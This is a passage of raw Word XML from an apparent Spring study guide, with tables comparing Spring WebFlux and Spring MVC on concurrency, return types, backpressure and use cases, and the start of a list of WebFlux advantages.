            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5652A124"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Synchronous / Blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFCD864"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Asynchronous / Non-blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6FDBD202" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38DAC5D7"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Servlet API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BE48C3E"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Uses Servlet API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49E4F6C5"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Reactive Streams (Reactor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="09FC8CF9" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F148CE3"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Concurrency Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="326DCB8A"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Thread-per-request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39263643"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Event-loop / non-blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="47143D63" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38B8DDC3"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27204940"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Limited for high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CA6D3B3"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Efficient at scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6103F3D5" w14:textId="07EBB16A" w:rsidR="00056743" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0005674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FAE2C70">
          <v:rect id="_x0000_i2210" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291A68E" w14:textId="73BDDE40" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="00163F3B" w:rsidP="00163F3B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="485" w:name="_Toc196307965"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Spring WebFlux and Spring MVC?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="485"/>
    </w:p>
    <w:p w14:paraId="7B6F303E" w14:textId="656F931C" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Here’s a concise </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between Spring WebFlux and Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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4"/>
        <w:gridCol w:w="3360"/>
        <w:gridCol w:w="4540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6408AB64" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="739AC30A" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1339550A" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring MVC (Traditional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19802498" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring WebFlux (Reactive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="069CA259" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BA402CE"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Programming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E0C6CC2"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Synchronous / Blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DB512BC"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Asynchronous / Non-blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="2CB07EF1" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="420CE0F6"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Underlying Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="031F12CA"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Servlet API (Tomcat, Jetty, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A20858E"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Reactive Streams (Reactor), Netty, Undertow, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1DFC418F" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A02B2AE"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Concurrency Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248D697F"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One thread per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6014EE06"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Event-loop / Non-blocking IO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="4CDCDA7A" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716BDB92"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Return Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D35AF6"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ModelAndView, ResponseEntity, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34557100"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Mono&lt;T&gt;, Flux&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6A427557" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB64D1E"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB946BA"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Not ideal for high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21DB0458"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Highly scalable for concurrent connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="3D9C3CFF" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="129C6E7D"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="164769C2"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Traditional web apps, CRUD apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CB101BB"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Real-time apps, Streaming, Microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="68F81C73" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DDCE937"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Backpressure Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EEBB003"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02CC0C14"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="22F1BAED" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11686909"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Web Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D922F0C"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RestTemplate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C23C2B8"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WebClient (non-blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="7216BD13" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E9CE4C6"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Server Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54014F21"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Servlet Containers (Tomcat, Jetty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51457E9A"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Netty, Servlet 3.1+, Undertow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D6067A7" w14:textId="77777777" w:rsidR="00454E0F"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42786E8">
          <v:rect id="_x0000_i2211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26756549" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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When to Use Each?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB5F7D"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Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – When working with traditional REST APIs or existing servlet-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4AFA34"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Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – When building high-performance, non-blocking apps like </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chat apps, real-time dashboards, IoT systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-load microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5133A0"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BA3B633">
          <v:rect id="_x0000_i2212" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D536892" w14:textId="798C6435"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486" w:name="_Toc196307966"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the advantages of Spring WebFlux over traditional Spring MVC</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="486"/>
    </w:p>
    <w:p w14:paraId="2F058281" w14:textId="55A6D486" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Here are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main advantages of Spring WebFlux over traditional Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C577A" w14:textId="77777777" w:rsidR="00454E0F"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1E4D4F9">
          <v:rect id="_x0000_i2213" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="346487D0" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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1. Non-blocking I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBAFBA7"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WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses reactive, non-blocking I/O under the hood (Netty or Servlet 3.1+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354E06B"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It can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thousands of concurrent connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with fewer resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32212E" w14:textId="77777777" w:rsidR="00454E0F"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CB3111">
          <v:rect id="_x0000_i2214" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="302FBBAA" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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2. Better Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F31BD"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Ideal for high-concurrency apps like </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chat systems, streaming platforms, or IoT applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D63F65A"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Uses event-loop model (like Node.js), which consumes less memory and CPU per request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEEBA9B" w14:textId="77777777" w:rsidR="00454E0F"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826467F">
          <v:rect id="_x0000_i2215" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="677992F7" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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3. Reactive Programming Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07F296"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Fully supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
